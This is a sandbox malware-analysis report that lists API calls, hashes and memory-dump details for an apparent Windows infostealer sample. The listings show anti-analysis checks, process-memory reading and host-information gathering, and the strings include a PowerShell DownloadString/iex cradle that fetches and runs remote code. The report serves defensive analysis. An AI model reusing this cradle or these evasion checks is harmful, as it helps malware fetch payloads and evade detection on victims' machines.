                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpystrtok_s$lstrlen
                    • String ID:
                    • API String ID: 3184129880-0
                    • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                    • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                    • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                    • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                    APIs
                    • __lock.LIBCMT ref: 0041B39A
                      • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                      • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                      • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                    • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                      • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                    • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                    • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2005412495-0
                    • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                    • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                    • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                    • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                    APIs
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 040B9B08
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 040B9B21
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 040B9B39
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 040B9B51
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 040B9B6A
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 040B9B82
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 040B9B9A
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 040B9BB3
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 040B9BCB
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 040B9BE3
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 040B9BFC
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 040B9C14
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 040B9C2C
                      • Part of subcall function 040B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 040B9C45
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040A1437: ExitProcess.KERNEL32 ref: 040A1478
                      • Part of subcall function 040A13C7: GetSystemInfo.KERNEL32(?), ref: 040A13D1
                      • Part of subcall function 040A13C7: ExitProcess.KERNEL32 ref: 040A13E5
                      • Part of subcall function 040A1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 040A1392
                      • Part of subcall function 040A1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 040A1399
                      • Part of subcall function 040A1377: ExitProcess.KERNEL32 ref: 040A13AA
                      • Part of subcall function 040A1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 040A14A5
                      • Part of subcall function 040A1487: __aulldiv.LIBCMT ref: 040A14BF
                      • Part of subcall function 040A1487: __aulldiv.LIBCMT ref: 040A14CD
                      • Part of subcall function 040A1487: ExitProcess.KERNEL32 ref: 040A14FB
                      • Part of subcall function 040B69D7: GetUserDefaultLangID.KERNEL32 ref: 040B69DB
                      • Part of subcall function 040A13F7: ExitProcess.KERNEL32 ref: 040A142D
                      • Part of subcall function 040B7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,040A141E), ref: 040B7AE7
                      • Part of subcall function 040B7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 040B7AEE
                      • Part of subcall function 040B7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 040B7B06
                      • Part of subcall function 040B7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B7B77
                      • Part of subcall function 040B7B47: RtlAllocateHeap.NTDLL(00000000), ref: 040B7B7E
                      • Part of subcall function 040B7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 040B7B96
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D31
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 040B6D4F
                    • CloseHandle.KERNEL32(00000000), ref: 040B6D60
                    • Sleep.KERNEL32(00001770), ref: 040B6D6B
                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D81
                    • ExitProcess.KERNEL32 ref: 040B6D89
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                    • Instruction ID: 0eeb0ca27772d2d5fd140d26254a6fea184fff4cc79e10b95dce74beb25e9b88
                    • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                    • Instruction Fuzzy Hash: 84312875A40208ABEB04FBF0DC54EFD7379AF5420CF540518A292B6190EF747A44CEAA
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                    • LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                    • ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                    • LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                    • CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                    • Instruction ID: 9a131ce33edba3811851c6aac971af703fed433491c241f9a8079dc5091a64e2
                    • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                    • Instruction Fuzzy Hash: 4231F6B8A00209EFDB14CF94C885BEE77F6FB49305F108158E915A7290C778AA91CFA1
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                    • LocalFree.KERNEL32(004102E7), ref: 00409A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                    • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                    • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                    • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                    APIs
                    • __getptd.LIBCMT ref: 040BCC51
                      • Part of subcall function 040BC206: __getptd_noexit.LIBCMT ref: 040BC209
                      • Part of subcall function 040BC206: __amsg_exit.LIBCMT ref: 040BC216
                    • __amsg_exit.LIBCMT ref: 040BCC71
                    • __lock.LIBCMT ref: 040BCC81
                    • InterlockedDecrement.KERNEL32(?), ref: 040BCC9E
                    • free.MSVCRT ref: 040BCCB1
                    • InterlockedIncrement.KERNEL32(0042B980), ref: 040BCCC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                    • String ID:
                    • API String ID: 634100517-0
                    • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                    • Instruction ID: e2daf2b489476666efaeee63b3def1aa5041aed347a88961ed619fb87def5198
                    • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                    • Instruction Fuzzy Hash: BF010031A04A24ABF762AB6894447DD73A0FF24718F10011ADCD4B7280CB347881DFDD
                    APIs
                    • __getptd.LIBCMT ref: 0041C9EA
                      • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                      • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                    • __amsg_exit.LIBCMT ref: 0041CA0A
                    • __lock.LIBCMT ref: 0041CA1A
                    • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                    • free.MSVCRT ref: 0041CA4A
                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                    • String ID:
                    • API String ID: 634100517-0
                    • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                    • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                    • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                    • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                    APIs
                    • strlen.MSVCRT ref: 040B7186
                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,040B7401,00000000,00420BA8,00000000,00000000), ref: 040B71B4
                      • Part of subcall function 040B6E37: strlen.MSVCRT ref: 040B6E48
                      • Part of subcall function 040B6E37: strlen.MSVCRT ref: 040B6E6C
                    • VirtualQueryEx.KERNEL32(040B7574,00000000,?,0000001C), ref: 040B71F9
                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,040B7401), ref: 040B731A
                      • Part of subcall function 040B7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 040B705F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: strlen$MemoryProcessQueryReadVirtual
                    • String ID: @
                    • API String ID: 2950663791-2766056989
                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                    • Instruction ID: b34be39c4df0fa904e9e00cc5214dea8e8f3e54fe8ec05e49f18684c9057a2b1
                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                    • Instruction Fuzzy Hash: 4651F6B1E04209EBDB04CF98D991AEFB7B6BF88700F148529F955B7240D734AA11CBA5
                    APIs
                    • strlen.MSVCRT ref: 00416F1F
                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                      • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                      • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: strlen$MemoryProcessQueryReadVirtual
                    • String ID: @
                    • API String ID: 2950663791-2766056989
                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                    • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                    • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                    APIs
                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: *n@$*n@
                    • API String ID: 1029625771-193229609
                    • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                    • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                    • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                    • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                    APIs
                    • lstrcat.KERNEL32(?,0064A30C), ref: 040B4A42
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                    • lstrcat.KERNEL32(?,00000000), ref: 040B4A68
                    • lstrcat.KERNEL32(?,?), ref: 040B4A87
                    • lstrcat.KERNEL32(?,?), ref: 040B4A9B
                    • lstrcat.KERNEL32(?,0064A284), ref: 040B4AAE
                    • lstrcat.KERNEL32(?,?), ref: 040B4AC2
                    • lstrcat.KERNEL32(?,0064A2C8), ref: 040B4AD6
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040B8FF7: GetFileAttributesA.KERNEL32(00000000,?,040A1DBB,?,?,00425654,?,?,00420E1F), ref: 040B9006
                      • Part of subcall function 040B47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 040B47E7
                      • Part of subcall function 040B47D7: RtlAllocateHeap.NTDLL(00000000), ref: 040B47EE
                      • Part of subcall function 040B47D7: wsprintfA.USER32 ref: 040B480D
                      • Part of subcall function 040B47D7: FindFirstFileA.KERNEL32(?,?), ref: 040B4824
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                    • String ID:
                    • API String ID: 2540262943-0
                    • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                    • Instruction ID: 9f322ab57d54b3dcde37b8cd9d0c52e818b36a5a99c3d7d86014dd4b14a57d39
                    • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                    • Instruction Fuzzy Hash: CC3166B6940208ABDB14F7F0CC84EED737DAB58708F4045C9A785A6090DE74A789CFD9
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                    Strings
                    • <, xrefs: 00412D39
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                    • ')", xrefs: 00412CB3
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 3031569214-898575020
                    • Opcode ID: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                    • Opcode Fuzzy Hash: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 040A14A5
                    • __aulldiv.LIBCMT ref: 040A14BF
                    • __aulldiv.LIBCMT ref: 040A14CD
                    • ExitProcess.KERNEL32 ref: 040A14FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction ID: b5684d820d0320b11381d73fbe87d5e8c3027c0d287ff9393c26748eaca1cbe5
                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                    • Instruction Fuzzy Hash: 8901FBB0950308FAEB10EFE4DC89BDDBAB9AB05709F208448E7057B2C0D6B4A5558759
                    APIs
                    • memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040B0CC7: memset.MSVCRT ref: 040B0E83
                      • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00000000), ref: 040B0E9C
                      • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 040B0EAE
                      • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00000000), ref: 040B0EC4
                      • Part of subcall function 040B0CC7: lstrcat.KERNEL32(?,00420D80), ref: 040B0ED6
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • memcmp.MSVCRT(?,00421114,00000003), ref: 040AA116
                    • memset.MSVCRT ref: 040AA14F
                    • LocalAlloc.KERNEL32(00000040,?), ref: 040AA1A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                    • String ID: @
                    • API String ID: 1977917189-2766056989
                    • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                    • Instruction ID: b2eeb875bddab68cfbd1641f7a1f02af3307542a8a7eb18993bf5fcc7c2985ec
                    • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                    • Instruction Fuzzy Hash: 06613931B00248ABEB24EFE8CD95FED77B5AF44308F408118E94AAB590DB747A15CF95
                    APIs
                    • strtok_s.MSVCRT ref: 00410DB8
                    • strtok_s.MSVCRT ref: 00410EFD
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
